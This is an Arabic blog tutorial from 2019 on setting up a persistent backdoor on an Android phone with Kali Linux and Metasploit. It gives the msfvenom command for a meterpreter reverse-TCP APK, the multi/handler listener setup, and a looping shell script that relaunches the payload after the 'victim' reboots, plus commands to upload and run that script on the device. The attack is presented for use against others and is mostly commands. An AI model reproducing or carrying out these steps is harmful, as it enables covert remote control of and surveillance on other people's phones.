انشاء باك دور دائم في الاندرويد باستخدام كالي لينكس

مواضيع مفضلة

الثلاثاء، 5 فبراير 2019

انشاء باك دور دائم في الاندرويد باستخدام كالي لينكس


اختراق الاندرويد كالي لينكس :-

في هذه الشرح سوف نتعرف على كيفية صنع بايلود دائم خاص بالاندرويد حيث لو قام الضحية بعمل ريستارت للجهاز سوف يعيد الاتصال بعد تشغيل الجهاز أي انك لن تفقد الضحية 


الخطوة الاولى :- 

انشاء بايلود خاص بالاندرويد باستخدام msfvenom طبعا هناك ادوات اخرة منها msfpayload التي استبدلت ب msfvenom عام 2015

 فتح تيرمنال جديد واكتب الامر الاتي  :- 

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=444 R > anything.apk

msfvenom android

بعد انشاء البايلود نقوم بعمل Listener 

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.1.3 your ip
set LPORT 444
exploit

payload android

الخطوة الثانية :-

تنفيذ سكربت دائم وذلك بنسخ السركبت الاتي الى النوت باد وحفظه بصيغة sh مهم جدا


 bin/bash/#!
: while
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

 

انشاء باك دور دائم في الاندرويد باستخدام كالي لينكسيجب ان يكون السكربت كما بصوره بدون مسافات بين كل سطرجديد اذا واجهتك مشكلة عدل على الكود لكي يظهر كما بصورة




الخطوة الثالثة :-

رفع السكربت الى الضحية المخترقة الى المسار etc/init.d  ولكن لن يعمل لانه يحتاج صلاحيات ليست بمشكلة قم برفعه على المسار الاتي cd /storage/emulated/0 او على الميموري الخارجية cd /storage/extSdCard
اتبع الخطوات

cd
cd /storage/emulated/0
ls
upload aaa.sh
يجب ان يكون ملف السكربت الذي تريد رفعه في ملف home
انشاء باك دور دائم في الاندرويد باستخدام كالي لينكس
انشاء باك دور دائم في الاندرويد باستخدام كالي لينكس


انشاء باك دور دائم في الاندرويد باستخدام كالي لينكس 
انشاء باك دور دائم في الاندرويد باستخدام كالي لينكس

الخطوة الرابعة :-

تنفيذ السكربت بدخول الى shell :-

/ cd
cd /storage/emulated/0
ls
shell
الان تنفيذ السكربت :-
aaa.sh

execute sh on shell
 السكربت سوف يعمل بعد ان يقوم الضحية بعمل ريستارت
الافضل ان يتم الاختراق باستخدام public ip وتثبيت ip باسهل الطرق بدون مشاكل
 اكتب في التعليقات اذا اردتم شرحه




إرسال تعليق

المشاركة على واتساب متوفرة فقط في الهواتف